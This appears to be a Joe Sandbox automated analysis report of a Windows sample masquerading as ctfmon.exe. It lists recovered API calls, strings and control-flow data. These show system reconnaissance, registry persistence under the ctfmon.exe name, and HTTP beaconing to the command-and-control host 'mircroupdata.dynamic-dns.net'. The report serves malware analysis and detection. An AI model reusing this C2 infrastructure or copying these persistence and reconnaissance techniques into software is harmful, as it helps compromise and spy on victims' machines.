20855->20860 20856 4130e0 ctype 5 API calls 20856->20859 20857 413b83 ctype 6 API calls 20857->20860 20858 413b3e VirtualFree HeapFree VirtualFree ctype 20858->20860 20859->20843 20859->20847 20859->20852 20859->20854 20859->20856 20861 412db7 VirtualFree VirtualFree HeapFree ctype 20859->20861 20870 40f2bb 20859->20870 20860->20843 20860->20849 20860->20851 20860->20855 20860->20857 20860->20858 20873 40f409 20860->20873 20861->20859 20868 4125de LeaveCriticalSection 20862->20868 20864 40edc6 20864->20836 20869 4125de LeaveCriticalSection 20865->20869 20867 40ee41 20867->20836 20868->20864 20869->20867 20876 4125de LeaveCriticalSection 20870->20876 20872 40f2c2 20872->20859 20877 4125de LeaveCriticalSection 20873->20877 20875 40f410 20875->20860 20876->20872 20877->20875 20878 40d029 GetVersion 20911 4103eb HeapCreate 20878->20911 20880 40d087 20881 40d094 20880->20881 20882 40d08c 20880->20882 20923 4101a8 20881->20923 21001 40d155 20882->21001 20886 40d099 20887 40d0a5 20886->20887 20888 40d09d 20886->20888 20933 40ffec 20887->20933 20889 40d155 8 API calls 20888->20889 20891 40d0a4 20889->20891 20891->20887 20892 40d0af 20947 40ff4b 20892->20947 20898 40d0c8 20987 40fafd 20898->20987 20900 40d0cd 20901 40d0d2 GetStartupInfoW 20900->20901 20902 40d0e4 20901->20902 20903 40d0ed 20902->20903 20904 40d0f6 GetModuleHandleA 20903->20904 20998 41f957 20904->20998 20907 40dd88 32 API calls 20908 40d111 20907->20908 21013 40f940 20908->21013 20912 410441 20911->20912 20913 41040b 20911->20913 20912->20880 21018 4102a3 20913->21018 20916 410427 20919 410444 20916->20919 21032 41388b 20916->21032 20917 41041a 21030 412d44 HeapAlloc 20917->21030 20919->20880 20920 410424 20920->20919 20922 410435 HeapDestroy 20920->20922 20922->20912 21089 412554 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 20923->21089 20925 4101ae TlsAlloc 20926 4101f8 20925->20926 20927 4101be 20925->20927 20926->20886 20928 413f58 30 API calls 20927->20928 20929 4101c7 20928->20929 20929->20926 20930 4101cf TlsSetValue 20929->20930 20930->20926 20931 4101e0 20930->20931 20932 4101e6 GetCurrentThreadId 20931->20932 20932->20886 20934 40e10c ctype 29 API calls 20933->20934 20935 40ffff 20934->20935 20936 41000d GetStartupInfoA 20935->20936 20937 40d130 ctype 7 API calls 20935->20937 20943 41012c 20936->20943 20946 41005b 20936->20946 20937->20936 20939 410157 GetStdHandle 20942 410165 GetFileType 20939->20942 20939->20943 20940 410197 SetHandleCount 20940->20892 20941 40e10c ctype 29 API calls 20941->20946 20942->20943 20943->20939 20943->20940 20944 4100d2 20944->20943 20945 4100f4 GetFileType 20944->20945 20945->20944 20946->20941 20946->20943 20946->20944 20948 40ff64 GetCommandLineW 20947->20948 20949 40ff88 20947->20949 20951 40ff76 GetCommandLineA 20948->20951 20952 40ff6a 20948->20952 20950 40ff8d GetCommandLineW 20949->20950 20955 40ff7c 20949->20955 20953 40d0b4 20950->20953 20951->20953 20951->20955 20952->20950 20962 40fdde 20953->20962 20954 40ff96 GetCommandLineA MultiByteToWideChar 20954->20953 20956 40ffb7 20954->20956 20955->20953 20955->20954 20957 40e10c ctype 29 API calls 20956->20957 20958 40ffc0 20957->20958 20958->20953 20959 40ffc7 MultiByteToWideChar 20958->20959 20959->20953 20960 40ffda 20959->20960 20961 40df0d ctype 29 API calls 20960->20961 20961->20953 20963 40fe28 20962->20963 20964 40fdfc GetEnvironmentStringsW 20962->20964 20966 40fe04 20963->20966 20967 40fe1c 20963->20967 20965 40fe10 GetEnvironmentStrings 20964->20965 20964->20966 20965->20967 20968 40d0be 20965->20968 20969 40fe31 GetEnvironmentStringsW 20966->20969 20970 40fe3d 20966->20970 20967->20968 20971 40fe88 GetEnvironmentStrings 20967->20971 20979 40fe90 ctype 20967->20979 21007 40fbb5 GetModuleFileNameW 20968->21007 20969->20968 20969->20970 20972 40e10c ctype 29 API calls 20970->20972 20971->20968 20971->20979 20975 40fe60 ctype 20972->20975 20973 40fec4 20976 40e10c ctype 29 API calls 20973->20976 20974 40fe97 MultiByteToWideChar 20974->20968 20974->20979 20978 40fe67 FreeEnvironmentStringsW 20975->20978 20977 40fed3 20976->20977 20980 40feda FreeEnvironmentStringsA 20977->20980 20985 40fee9 ctype 20977->20985 20978->20968 20979->20973 20979->20974 20980->20968 20981 40ff31 FreeEnvironmentStringsA 20981->20968 20982 40fef2 MultiByteToWideChar 20983 40ff37 20982->20983 20982->20985 20986 40df0d ctype 29 API calls 20983->20986 20985->20981 20985->20982 20986->20981 20988 40fb07 20987->20988 20989 40e10c ctype 29 API calls 20988->20989 20990 40fb30 20989->20990 20992 40d130 ctype 7 API calls 20990->20992 20997 40fb44 20990->20997 20991 40fb91 20993 40df0d ctype 29 API calls 20991->20993 20992->20997 20994 40fb9d 20993->20994 20994->20900 20995 40e10c ctype 29 API calls 20995->20997 20996 40d130 ctype 7 API calls 20996->20997 20997->20991 20997->20995 20997->20996 21090 426014 20998->21090 21002 40d163 21001->21002 21003 40d15e 21001->21003 21004 410561 ctype 7 API calls 21002->21004 21005 410528 ctype 7 API calls 21003->21005 21006 40d16c ExitProcess 21004->21006 21005->21002 21008 40fbe2 21007->21008 21009 40e10c ctype 29 API calls 21008->21009 21010 40fc07 21009->21010 21011 40fc17 21010->21011 21012 40d130 ctype 7 API calls 21010->21012 21011->20898 21012->21011 21014 41020f 35 API calls 21013->21014 21016 40f94b 21014->21016 21015 40fa71 UnhandledExceptionFilter 21017 40d122 21015->21017 21016->21015 21016->21017 21019 40dbe0 21018->21019 21020 4102b0 GetVersionExA 21019->21020 21021 4102e6 GetEnvironmentVariableA 21020->21021 21022 4102cc 21020->21022 21025 410305 21021->21025 21029 4103c3 21021->21029 21022->21021 21023 4102de 21022->21023 21023->20916 21023->20917 21026 41034a GetModuleFileNameA 21025->21026 21028 410342 21025->21028 21026->21028 21028->21029 21041 4150fb 21028->21041 21029->21023 21044 410276 GetModuleHandleA 21029->21044 21031 412d60 21030->21031 21031->20920 21033 413898 21032->21033 21034 41389f HeapAlloc 21032->21034 21035 4138bc VirtualAlloc 21033->21035 21034->21035 21040 4138f4 ctype 21034->21040 21036 4139b1 21035->21036 21037 4138dc VirtualAlloc 21035->21037 21038 4139b9 HeapFree 21036->21038 21036->21040 21039 4139a3 VirtualFree 21037->21039 21037->21040 21038->21040 21039->21036 21040->20920 21046 415112 21041->21046 21045 41028d 21044->21045 21045->21023 21048 41512a 21046->21048 21049 41515a 21048->21049 21055 415e36 21048->21055 21050 41510e 21049->21050 21051 415e36 6 API calls 21049->21051 21053 415283 21049->21053 21059 416820 21049->21059 21050->21029 21051->21049 21053->21050 21054 40f92e 35 API calls 21053->21054 21054->21050 21056 415e54 21055->21056 21058 415e48 21055->21058 21070 416c3f 21056->21070 21058->21048 21060 41683e InterlockedIncrement 21059->21060 21069 41682b 21059->21069 21061 416864 21060->21061 21062 41685a InterlockedDecrement 21060->21062 21082 41688f 21061->21082 21064 41257d ctype 29 API calls 21062->21064 21064->21061 21066 416884 InterlockedDecrement 21066->21069 21067 41687a 21088 4125de LeaveCriticalSection 21067->21088 21069->21049 21071 416c70 GetStringTypeW 21070->21071 21072 416c88 21070->21072 21071->21072 21073 416c8c GetStringTypeA 21071->21073 21074 416cb3 GetStringTypeA 21072->21074 21075 416cd7 21072->21075 21073->21072 21076 416d74 21073->21076 21074->21076 21075->21076 21078 416ced MultiByteToWideChar 21075->21078 21076->21058 21078->21076 21079 416d11 ctype 21078->21079 21079->21076 21080 416d4b MultiByteToWideChar 21079->21080 21080->21076 21081 416d64 GetStringTypeW 21080->21081 21081->21076 21083 4168ba 21082->21083 21087 416871 21082->21087 21084 4168d6 21083->21084 21085 415e36 6 API calls 21083->21085 21086 412330 9 API calls 21084->21086 21084->21087 21085->21084 21086->21087 21087->21066 21087->21067 21088->21069 21089->20925 21091 4203c0 28 API calls 21090->21091 21092 42601f 21091->21092 21093 4283ee ctype 28 API calls 21092->21093 21094 426026 21093->21094 21099 4291c6 SetErrorMode SetErrorMode 21094->21099 21100 4283ee ctype 28 API calls 21099->21100 21101 4291dd 21100->21101 21102 4283ee ctype 28 API calls 21101->21102 21103 4291ec 21102->21103 21104 429212 21103->21104 21130 429229 21103->21130 21106 4283ee ctype 28 API calls 21104->21106 21107 429217 21106->21107 21108 42603e 21107->21108 21148 4203d5 21107->21148 21110 42aeab 21108->21110 21111 4283ee ctype 28 API calls 21110->21111 21112 42aeb4 21111->21112 21113 428f39 ctype 6 API calls 21112->21113 21115 42aebd 21113->21115 21114 42aeec 21116 428fa9 ctype LeaveCriticalSection 21114->21116 21115->21114 21118 4283ee ctype 28 API calls 21115->21118 21117 42aef7 21116->21117 21119 4283ee ctype 28 API calls 21117->21119 21120 42aedd UnregisterClassW 21118->21120 21121 42aefc 21119->21121 21120->21115 21122 4281c1 21 API calls 21121->21122 21123 42af14 21122->21123 21124 4283ee ctype 28 API calls 21123->21124 21125 42af39 21124->21125 21126 40d108 21125->21126 21127 42af51 21125->21127 21128 42af4b UnhookWindowsHookEx 21125->21128 21126->20907 21127->21126 21129 42af58 UnhookWindowsHookEx 21127->21129 21128->21127 21129->21126 21131 4283ee ctype 28 API calls 21130->21131 21132 42923c GetModuleFileNameW 21131->21132 21133 42926e 21132->21133 21159 429348 21133->21159 21136 4292a1 21138 4292db 21136->21138 21139 424b39 29 API calls 21136->21139 21140 4292f3 lstrcpyW 21138->21140 21141 42930d 21138->21141 21142 4292c3 21139->21142 21143 40dedf 29 API calls 21140->21143 21144 42933c 21141->21144 21145 42931e lstrcatW 21141->21145 21147 40dedf 29 API calls 21142->21147 21143->21141 21144->21104 21146 40dedf 29 API calls 21145->21146 21146->21144 21147->21138 21149 4283ee ctype 28 API calls 21148->21149 21150 4203da 21149->21150 21151 4281c1 21 API calls 21150->21151 21157 420432 21150->21157 21152 4203e6 GetCurrentThreadId SetWindowsHookExW 21151->21152 21153 428c9a ctype 7 API calls 21152->21153 21154 420410 21153->21154 21156 4283ee ctype 28 API calls 21154->21156 21158 42041d 21154->21158 21155 428c05 ctype 21 API calls 21155->21157 21156->21158 21157->21108 21158->21155 21160 429353 21159->21160 21161 429385 lstrcpynW 21160->21161 21162 42937b lstrlenW 21160->21162 21163 42928b 21161->21163 21162->21163 21163->21136 21164 40dedf 21163->21164 21165 40dee8 21164->21165 21167 40def8 21164->21167 21166 40e10c ctype 29 API calls 21165->21166 21166->21167 21167->21136
        APIs
        • GetAdaptersInfo.IPHLPAPI ref: 00403563
        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00403586
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AdaptersInfo
        • String ID:
        • API String ID: 3177971545-0
        • Opcode ID: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
        • Instruction ID: 6b7a8a9e45624f5e4ac54a2b774ff4b4d77386f4916c747b8fc9f6bd6b467c43
        • Opcode Fuzzy Hash: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
        • Instruction Fuzzy Hash: F911C6B16003046BDB14EE629CC196B77DCEBC4715F04493EF9099B286EB39ED098766

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 0040150F
        • WSAStartup.WS2_32(00000202,?), ref: 00401522
        • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040152D
        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040153F
        • FreeLibrary.KERNEL32(00000000), ref: 0040154B
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C17
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C2B
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C3F
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C53
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C67
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C7B
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGH), ref: 00401C97
        • SetEvent.KERNEL32(00000000), ref: 00401C9F
        • CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARA), ref: 00401CAF
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend), ref: 00401CBF
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet), ref: 00401CCF
        • CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost), ref: 00401CE0
        • CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001), ref: 00401CEF
        • CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002), ref: 00401CFE
          • Part of subcall function 00405040: GetCommandLineW.KERNEL32(76232F60), ref: 00405068
          • Part of subcall function 00403190: GetComputerNameW.KERNEL32(?), ref: 00403223
          • Part of subcall function 00403190: gethostname.WS2_32(?,00000100), ref: 0040325F
          • Part of subcall function 00403190: gethostbyname.WS2_32(?), ref: 0040326D
          • Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
          • Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E
        • CreateThread.KERNEL32(00000000,00000000,Function_00003C80,00000000,00000000,00000000), ref: 00401D64
        • CreateThread.KERNEL32(00000000,00000000,Function_00004150,00000000,00000000,00000000), ref: 00401D70
        • CreateThread.KERNEL32(00000000,00000000,Function_00001130,00000000,00000000,00000000), ref: 00401D7C
        • CreateThread.KERNEL32 ref: 00401D99
        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00401DB7
        • Sleep.KERNEL32(00001388), ref: 00401DC8
        • InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00401DE2
        • InternetCloseHandle.WININET(00000000), ref: 00401DEF
        • Sleep.KERNEL32(00001388), ref: 00401DF6
        • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84400100,00000002), ref: 00401E19
        • InternetCloseHandle.WININET(00000000), ref: 00401E26
        • InternetCloseHandle.WININET(00000000), ref: 00401E29
        • Sleep.KERNEL32(00001388), ref: 00401E30
        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 00401E48
        • Sleep.KERNEL32(0000000A), ref: 00401E69
        • WaitForSingleObject.KERNEL32(00000344,000000FF), ref: 00401E78
        • ResetEvent.KERNEL32(00000340), ref: 00401E85
        • HttpAddRequestHeadersA.WININET(00000000,?,?,A0000000), ref: 00401F0E
        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401F1D
        • InternetReadFile.WININET(00000000,?,00080000,?), ref: 00401F45
        • GetLastError.KERNEL32(?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F5E
        • SetEvent.KERNEL32(00000340,?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F6B
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Create$Event$AllocInternetVirtual$SleepThread$CloseHandleHttpRequest$LibraryOpen$AddressCommandComputerConnectDriveDrivesErrorFileFreeHeadersLastLineLoadLogicalNameObjectOptionProcReadResetSendSingleStartupTypeWaitgethostbynamegethostname
        • String ID: $#$#$'$*$+$+$3$4$5$675052$9$:$@$@$B$B$GET$GetNativeSystemInfo$H$H$H$H$Kernel32.dll$L$L$L$L$L$L$L$L$L$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$N$O$P$P$P$P$P$P$P$P$P$P$PTPM$Q$Q$Q$Q$R$R$R$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$T$T$V$X$X$X$X$Y$[$\$\$]$^$_$_$`$`$`$a$a$a$d$d$d$fsdf++_[)**huahj6po1klHGH$fsdf++_[)**huahj6po1klHGHSENDDATAPARA$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost$fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend$h$h$h$h$item.asp?spm=xx{}:>*()_!$j$j$k$mircroupdata.dynamic-dns.net$p$t$t$|$|
        • API String ID: 532994470-3063579737
        • Opcode ID: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
        • Instruction ID: bf1a022c60407e02be0dd9bd1b531f7c38c72e15a62a5c9b7b3f82dbccb0f244
        • Opcode Fuzzy Hash: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
        • Instruction Fuzzy Hash: 7D62482010C7C5D9E332C7788849B8FBED55BA7324F484A9DF1E86B2D2C6B95109C76B

        Control-flow Graph

        APIs
        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00402C18
        • Sleep.KERNEL32(00001388), ref: 00402C2C
        • InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000003), ref: 00402C42
        • InternetCloseHandle.WININET(00CC0008), ref: 00402C53
        • Sleep.KERNEL32(00001388), ref: 00402C5A
        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,84400100,00000004), ref: 00402C76
        • InternetCloseHandle.WININET(00CC000C), ref: 00402C88
        • InternetCloseHandle.WININET(00CC0008), ref: 00402C90
        • Sleep.KERNEL32(00001388), ref: 00402C97
        • InternetSetOptionA.WININET(00000000,00000005,0000000A,00000004), ref: 00402CA8
        • ResetEvent.KERNEL32(0000033C), ref: 00402CB5
        • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 00402CCF
        • WaitForSingleObject.KERNEL32(00000340,000000FF), ref: 00402CDA
        • ResetEvent.KERNEL32(00000344), ref: 00402CE3
        • SetEvent.KERNEL32(00000338,?,A0000000,?,?,A0000000), ref: 00402CFB
        • SetEvent.KERNEL32(00000338), ref: 00402D13
        • HttpAddRequestHeadersA.WININET(00CC0010,?,?,A0000000), ref: 00402D9A
        • HttpAddRequestHeadersA.WININET(00CC0010,?,?,A0000000), ref: 00402E95
        • HttpSendRequestA.WININET(00CC0010,00000000,00000000,004BC7C4,00000000), ref: 00402EAE
        • InternetReadFile.WININET(00CC0010,0043C7C4,000186A0,?), ref: 00402ED4
        • GetLastError.KERNEL32(?,A0000000,?,?,A0000000), ref: 00402EEA
        • SetEvent.KERNEL32(00000344,?,A0000000,?,?,A0000000), ref: 00402F05
        • ResetEvent.KERNEL32(0000033C,?,A0000000,?,?,A0000000), ref: 00402F12
        Strings
        • Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00402D64
        • POST, xrefs: 00402C70
        • PTPM, xrefs: 00402DA1
        • item.asp?spm=xx{}:>*()_!, xrefs: 00402BAF
        • Content-Length: %u, xrefs: 00402E66
        • mircroupdata.dynamic-dns.net, xrefs: 00402C3C
        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00402C13
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Internet$Event$HttpRequest$CloseHandleResetSleep$HeadersObjectOpenSingleWait$ConnectErrorFileLastOptionReadSend
        • String ID: Content-Length: %u$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$POST$PTPM$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$item.asp?spm=xx{}:>*()_!$mircroupdata.dynamic-dns.net
        • API String ID: 3227742456-1989333268
        • Opcode ID: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
        • Instruction ID: 5521d0e7914338b547ae66bed9a7008d46125a5347177c733f9cd849099ed627
        • Opcode Fuzzy Hash: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
        • Instruction Fuzzy Hash: 3291E672740302ABD714DB64EC85F2B3BA9EB98B00F50452DF905B73D1DBB8E8059B69

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 79 403190-4031a5 80 403545-40354f 79->80 81 4031ab-40322e GetComputerNameW 79->81 82 403230 81->82 83 403238-403275 gethostname gethostbyname 81->83 82->83 84 403277-4032d7 call 40d60e call 403550 83->84 85 4032df-40336d timeGetTime call 40d60e 83->85 94 4032dc 84->94 85->80 90 403373-403397 GetVersionExW 85->90 92 4033b0-4033b7 90->92 93 403399-4033aa GetVersionExW 90->93 95 403446-403449 92->95 96 4033bd-4033c4 92->96 93->80 93->92 94->85 97 4034f6-403543 call 40d60e 95->97 98 40344f-403456 95->98 99 4033c6-4033d5 96->99 100 4033eb-4033f2 96->100 97->80 101 4034b8-4034bb 98->101 102 403458-403464 GetSystemMetrics 98->102 103 4033e1-4033e6 99->103 104 4033d7-4033dc 99->104 105 4033f4-403403 100->105 106 403419-40341b 100->106 114 4034ca-4034cc 101->114 115 4034bd-4034c8 101->115 109 403473-40347d 102->109 110 403466-403471 102->110 111 4034d9-4034f4 103->111 104->111 112 403405-40340a 105->112 113 40340f-403414 105->113 106->97 116 403421-403430 106->116 117 40348c-403492 GetSystemMetrics 109->117 118 40347f-40348a 109->118 110->111 111->97 112->111 113->111 114->97 119 4034ce-4034d4 114->119 115->111 120 403432-403437 116->120 121 40343c-403441 116->121 122 4034a1-4034a9 117->122 123 403494-40349f 117->123 118->111 119->111 120->111 121->111 122->97 124 4034ab-4034b6 122->124 123->111 124->111
        APIs
        • GetComputerNameW.KERNEL32(?), ref: 00403223
        • gethostname.WS2_32(?,00000100), ref: 0040325F
        • gethostbyname.WS2_32(?), ref: 0040326D
        • timeGetTime.WINMM ref: 004032FD
        • GetVersionExW.KERNEL32(?), ref: 00403393
        • GetVersionExW.KERNEL32(0000011C), ref: 004033A6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Version$ComputerNameTimegethostbynamegethostnametime
        • String ID: SP%d$%3dD:%2dH:%2dM$%d.%d.%d.%d$<$<`/#v$Windows 2000$Windows 7$Windows 8$Windows Home Server$Windows Server 2003$Windows Server 2003 R2$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Vista$Windows XP$Windows XP Professional x64
        • API String ID: 855337075-699715364
        • Opcode ID: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
        • Instruction ID: bdf93ca89eb0b6f63a75df1cd038082309c9780f61bd84f6bf5dbb40301ebfc2
        • Opcode Fuzzy Hash: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
        • Instruction Fuzzy Hash: E4A1C731608345ABC724CE24C8406AFBBE6AFC5310F544A3EF549DB3D0DB78DA49875A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 125 404620-4047a8 GetCommandLineA call 4248ad call 41f9b6 WideCharToMultiByte 130 4047aa-4047b9 125->130 130->130 131 4047bb-4047e1 RegOpenKeyExA GetLastError 130->131 132 4047f3-404819 RegQueryValueExA 131->132 133 4047e3-4047ee 131->133 135 404838-40485e 132->135 136 40481b-40481e 132->136 134 4048ab-4048cb call 424739 133->134 137 404860-404871 135->137 138 404873-404893 RegSetValueExA 135->138 136->135 140 404820-404836 RegCloseKey 136->140 137->138 141 404899-4048a4 RegCloseKey 137->141 138->141 140->134 141->134
        APIs
        • GetCommandLineA.KERNEL32 ref: 0040468A
          • Part of subcall function 004248AD: lstrlenA.KERNEL32(004058A3,?,?,?,004058A3,?), ref: 004248BB
        • WideCharToMultiByte.KERNEL32(00000000,00000000,76945540,?,?,00000104,00000000,00000000,00000022,00000000), ref: 004046C0
        • RegOpenKeyExA.KERNEL32(80000001,0000001D,00000000,000F003F,?), ref: 004047D1
        • GetLastError.KERNEL32 ref: 004047D9
        • RegQueryValueExA.KERNEL32(0000001D,ctfmon.exe,00000000,00000000,00000000,00000104), ref: 00404811
        • RegCloseKey.ADVAPI32(?), ref: 00404825
        • RegSetValueExA.KERNEL32(?,ctfmon.exe,00000000,00000001,?,0000001C), ref: 00404893
        • RegCloseKey.KERNEL32(?), ref: 0040489E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseValue$ByteCharCommandErrorLastLineMultiOpenQueryWidelstrlen
        • String ID: '$'$'$($*$+$+$-$9$:$:$;$;$=$=$=$ctfmon.exe
        • API String ID: 3300019627-3918993357
        • Opcode ID: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
        • Instruction ID: aab2ec02df40a054bcdff1db174f22e23601e58f66f7115433a06adc50c1c808
        • Opcode Fuzzy Hash: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
        • Instruction Fuzzy Hash: 9D814B7120D3C0DED322CB689888B9FBFD4ABE6308F48495DF1D557282C6B99509C767

        Control-flow Graph

        • Executed
        • Not Executed
